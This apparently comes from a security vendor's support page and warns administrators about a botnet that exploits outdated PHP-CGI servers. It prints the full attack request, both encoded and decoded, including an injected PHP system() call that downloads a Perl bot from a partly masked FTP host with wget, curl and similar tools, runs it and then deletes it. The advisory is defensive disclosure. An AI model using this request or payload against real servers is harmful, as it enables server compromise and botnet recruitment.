Botnet/Worm PHP Attack

Botnet/Worm PHP Attack

Similar Variants Seen Attacking Multiple Sites


Our engineering team have noted an increase in the number of attacks targetting PHP recently, which potentially require further investigation for any administrators running outdated versions of PHP.   
There is a botnet spreading itself via search engines, finding potentially vulnerable PHP systems and attempting to make changes to the server.


The vulnerability which this attack is targeting is detailed here:
The attack requests look like the following:

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1Host: -hContent-Type: application/x-www-form-urlencodedContent-Length: 266<? system("killall -9 perl;killall -9 php;cd /tmp;wget ftp://1xx.xx.xx.xx/bko -O /tmp/bko; curl -O ftp://1xx.xx.xx.xx/bko -O /tmp/bko;fetch -U ftp://1xx.xx.xx.xx/bko -O /tmp/bko;lwp-download ftp://1xx.xx.xx.xx/bko -O /tmp/bko;perl /tmp/bko;rm -rf /tmp/bko*"); ?>
The decoded version of the URI looks like this:

//cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n 
The main payload is contained within the referenced FTP download; which is an attempt to get servers to join a botnet. The botnet has successfully compromised a number of PHP web servers so far from various countries.  


We recommend that the version of PHP on your web servers should be checked to verify whether your systems are not vulnerable to the exploit. Customers should open a case with RedShield if assistance is required to determine whether systems are vulnerable, or already exploited.
Was this article helpful?
0 out of 0 found this helpful
Have more questions? Submit a request